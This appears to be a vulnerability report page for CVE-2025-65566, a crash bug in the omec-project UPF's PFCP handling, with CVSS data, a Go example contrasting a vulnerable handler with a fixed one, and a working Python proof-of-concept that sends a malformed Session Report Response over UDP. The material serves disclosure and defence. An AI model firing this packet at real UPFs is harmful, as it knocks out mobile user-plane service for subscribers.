Security Vulnerability Report
CVE-2025-65566 CVSS 7.5 HIGH

Published: 2025-12-18 20:16:08
Last Modified: 2026-01-06 16:18:14

Description

A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Session Report Response that is missing the mandatory Cause Information Element, the session report handler dereferences a nil pointer (CWE-476) instead of rejecting the malformed message. This triggers a Go panic and terminates the UPF process. An attacker who can send PFCP Session Report Response messages to the UPF's N4/PFCP endpoint (UDP port 8805) can exploit this flaw to repeatedly crash the UPF and disrupt user-plane services.

PFCP carries no authentication of its own, which is why the vector scores PR:N; reachability of the listener is the practical gate. The N4 interface should be reachable only from the SMF (or the control-plane network), so operators should verify that UDP 8805 on the UPF is not exposed beyond that segment and, where N4 crosses an untrusted network, that it is protected by IPsec or an equivalent tunnel. The original report and the fix are tracked in https://github.com/omec-project/upf/issues/958.
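As an added illustration (not pfcpiface's own code, which this page does not reproduce), the Go program below shows the failure mode and the fix pattern side by side: a minimal PFCP decoder that walks the header and the TLV-encoded Information Elements, a handler that dereferences the Cause IE unconditionally and therefore panics on a response without it, a hardened handler that rejects such a message with an error, and a recovering dispatcher as defence in depth. Message type 57, IE types 19 (Cause) and 60 (Node ID), the S flag and the header layout are taken from 3GPP TS 29.244; the type and function names, the SEID 0x1122334455667788 and the messages built by buildResponse are assumptions made for this example.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Values from 3GPP TS 29.244; every other name in this file is illustrative.
const (
	pfcpFlagSEID             = 0x01 // octet 1 bit 1: SEID present
	msgSessionReportResponse = 57
	ieCause                  = 19
	ieNodeID                 = 60
	causeRequestAccepted     = 1
)

var errTruncated = errors.New("pfcp: truncated message")

// pfcpMessage holds the header fields plus IE type to raw value.
type pfcpMessage struct {
	Type uint8
	SEID uint64
	Seq  uint32
	IEs  map[uint16][]byte
}

// parsePFCP decodes the header and walks the TLV IEs, bounds checking every length.
func parsePFCP(b []byte) (*pfcpMessage, error) {
	if len(b) < 4 || len(b) < 4+int(binary.BigEndian.Uint16(b[2:4])) {
		return nil, errTruncated
	}
	m := &pfcpMessage{Type: b[1], IEs: map[uint16][]byte{}}
	body := b[4 : 4+int(binary.BigEndian.Uint16(b[2:4]))]
	if b[0]&pfcpFlagSEID != 0 { // session-level message: 8-octet SEID comes first
		if len(body) < 12 {
			return nil, errTruncated
		}
		m.SEID, body = binary.BigEndian.Uint64(body[:8]), body[8:]
	}
	if len(body) < 4 { // sequence number (3 octets) plus a spare octet
		return nil, errTruncated
	}
	m.Seq, body = binary.BigEndian.Uint32(body[:4])>>8, body[4:]
	for len(body) > 0 {
		if len(body) < 4 || len(body) < 4+int(binary.BigEndian.Uint16(body[2:4])) {
			return nil, errTruncated
		}
		l := int(binary.BigEndian.Uint16(body[2:4]))
		m.IEs[binary.BigEndian.Uint16(body[:2])] = body[4 : 4+l]
		body = body[4+l:]
	}
	return m, nil
}

// cause returns a pointer to the Cause value, or nil when the IE is absent.
func (m *pfcpMessage) cause() *uint8 {
	if v, ok := m.IEs[ieCause]; ok && len(v) > 0 {
		return &v[0]
	}
	return nil
}

// handleReportResponseVulnerable mirrors the CVE-2025-65566 failure mode:
// Cause is dereferenced with no presence check, so a response without it panics.
func handleReportResponseVulnerable(m *pfcpMessage) bool {
	return *m.cause() == causeRequestAccepted
}

// handleReportResponseHardened checks the mandatory IE first and returns an
// error the caller can log and drop instead of crashing the process.
func handleReportResponseHardened(m *pfcpMessage) (bool, error) {
	c := m.cause()
	if c == nil {
		return false, errors.New("pfcp: Session Report Response missing mandatory Cause IE")
	}
	return *c == causeRequestAccepted, nil
}

// safeDispatch is the defence-in-depth layer: a handler panic becomes an error.
func safeDispatch(m *pfcpMessage, h func(*pfcpMessage) bool) (accepted bool, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("pfcp: handler panicked: %v", r)
		}
	}()
	return h(m), nil
}

// buildResponse constructs test input (not captured traffic): a Session Report
// Response with a made-up SEID, sequence number 1 and the given IEs.
func buildResponse(ies map[uint16][]byte) []byte {
	body := make([]byte, 12)
	binary.BigEndian.PutUint64(body, 0x1122334455667788)
	binary.BigEndian.PutUint32(body[8:], 1<<8) // sequence 1 in the top 24 bits
	for t, v := range ies {
		tl := make([]byte, 4)
		binary.BigEndian.PutUint16(tl, t)
		binary.BigEndian.PutUint16(tl[2:], uint16(len(v)))
		body = append(append(body, tl...), v...)
	}
	hdr := []byte{1<<5 | pfcpFlagSEID, msgSessionReportResponse, 0, 0}
	binary.BigEndian.PutUint16(hdr[2:], uint16(len(body)))
	return append(hdr, body...)
}
```

Feeding a response that carries only a Node ID IE (the shape the PoC on this page sends) through safeDispatch with handleReportResponseVulnerable yields a recovered nil-pointer panic, whereas handleReportResponseHardened returns an error for the same bytes and accepts a response that does carry Cause. The presence check before the dereference is the whole fix; the recover wrapper only limits blast radius when the next missing check is found.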

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:upf:2.1.3:dev:*:*:*:*:*:* - VULNERABLE
omec-project upf-epc-pfcpiface:2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-65566 PoC - Malformed PFCP Session Report Response

Sends a PFCP Session Report Response that omits the mandatory Cause
Information Element, which triggers a nil pointer dereference in the
omec-project UPF pfcpiface component.

Note: This is for educational and authorized testing purposes only.
"""
import socket
import struct
import sys

# Constants from 3GPP TS 29.244
PFCP_PORT = 8805
PFCP_VERSION = 1
FLAG_S = 0x01                      # octet 1 bit 1: SEID present (set on every session-level message)
MSG_SESSION_REPORT_RESPONSE = 57   # 0x39; type 56 is the Session Report Request
IE_CAUSE = 19                      # mandatory in a Session Report Response; deliberately omitted below
IE_NODE_ID = 60
NODE_ID_TYPE_FQDN = 2              # Node ID Type: 0 = IPv4, 1 = IPv6, 2 = FQDN


def build_ie(ie_type, payload):
    """Encode one IE as Type (2 octets), Length (2 octets), Value."""
    return struct.pack('!HH', ie_type, len(payload)) + payload


def encode_fqdn(name):
    """FQDN as length-prefixed labels, the DNS-style encoding the Node ID IE uses."""
    return b''.join(bytes([len(label)]) + label for label in name.encode().split(b'.'))


def build_pfcp_message(message_type, sequence_number, seid, ies):
    """
    Assemble a session-level PFCP message:
      octet 1        version (3 bits), spare, MP flag, S flag
      octet 2        message type
      octets 3-4     length of everything that follows the length field
      octets 5-12    SEID (present because the S flag is set)
      octets 13-15   sequence number (24 bits), octet 16 spare
    """
    body = struct.pack('!QI', seid, sequence_number << 8) + ies
    return struct.pack('!BBH', (PFCP_VERSION << 5) | FLAG_S, message_type, len(body)) + body


def build_malformed_session_report_response(seid=0, sequence_number=1):
    """
    Session Report Response carrying only an optional Node ID IE and no Cause IE.
    A conforming CP function always includes Cause; its absence is what the
    vulnerable handler fails to check before dereferencing it.
    """
    node_id = build_ie(IE_NODE_ID, bytes([NODE_ID_TYPE_FQDN]) + encode_fqdn('upf.example.com'))
    return build_pfcp_message(MSG_SESSION_REPORT_RESPONSE, sequence_number, seid, node_id)


def send_malformed_pfcp_message(target_ip, target_port=PFCP_PORT, seid=0):
    """Send the malformed Session Report Response to the target UPF over UDP."""
    malformed_msg = build_malformed_session_report_response(seid=seid)
    print(f"[*] Sending malformed PFCP Session Report Response to {target_ip}:{target_port}")
    print(f"[*] Message length: {len(malformed_msg)} bytes")
    print(f"[*] Message hex: {malformed_msg.hex()}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(malformed_msg, (target_ip, target_port))
        print("[+] Malformed message sent successfully")
        print("[!] If target is vulnerable, UPF process should crash with panic")
    except OSError as e:
        print(f"[-] Error sending message: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-65566-poc.py <target_ip> [port] [seid_hex]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else PFCP_PORT
    # SEID of the session the UPF reported on. The advisory does not say whether the
    # handler looks the session up before touching Cause, so 0 is only a default.
    seid = int(sys.argv[3], 16) if len(sys.argv) > 3 else 0
    send_malformed_pfcp_message(target, port, seid)

References

https://github.com/omec-project/upf/issues/958 (Exploit, Patch, Issue Tracking)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-65566",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-18T20:16:07.647",
    "lastModified": "2026-01-06T16:18:14.383",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Session Report Response that is missing the mandatory Cause Information Element, the session report handler dereferences a nil pointer instead of rejecting the malformed message. This triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Report Response messages to the UPF's N4/PFCP endpoint can exploit this flaw to repeatedly crash the UPF and disrupt user-plane services."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-476"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linuxfoundation:upf:2.1.3:dev:*:*:*:*:*:*",
                "matchCriteriaId": "F5D98CF2-1D67-4E3A-B8AA-6B5F6D2FF666"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/omec-project/upf/issues/958", "source": "[email protected]", "tags": ["Exploit", "Patch", "Issue Tracking"]},
      {"url": "https://github.com/omec-project/upf/issues/958", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Issue Tracking"]}
    ]
  }
}